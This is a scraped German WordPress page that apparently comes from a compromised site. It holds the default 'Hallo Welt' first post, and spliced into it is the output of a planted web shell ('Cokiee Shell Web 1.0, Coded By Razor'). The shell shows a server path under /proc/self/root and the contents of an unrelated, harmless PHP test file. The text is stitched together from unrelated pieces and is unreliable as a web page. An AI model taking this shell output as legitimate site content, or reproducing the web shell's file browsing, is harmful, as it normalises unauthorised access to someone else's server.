Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/bug73124.phpt |
--TEST-- Bug #73124 (php_ini_scanned_files relied on PHP_CONFIG_FILE_SCAN_DIR) --SKIPIF-- <?php if (!empty(PHP_CONFIG_FILE_SCAN_DIR)) die("Skip: PHP_CONFIG_FILE_SCAN_DIR must not be available"); ?> --FILE-- <?php $tempDir = sys_get_temp_dir(); putenv('PHP_INI_SCAN_DIR='.$tempDir); $inifile = $tempDir.DIRECTORY_SEPARATOR.'scan-dir.ini'; @unlink($inifile); file_put_contents($inifile, "\n"); $php = getenv('TEST_PHP_EXECUTABLE'); passthru('"'.$php.'" -r "print_r(php_ini_scanned_files());"'); putenv('PHP_INI_SCAN_DIR='); @unlink($inifile); ?> --EXPECTREGEX-- .*[\/\\]scan-dir\.ini.*|.*[\/\\]scan-dir\.ini Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare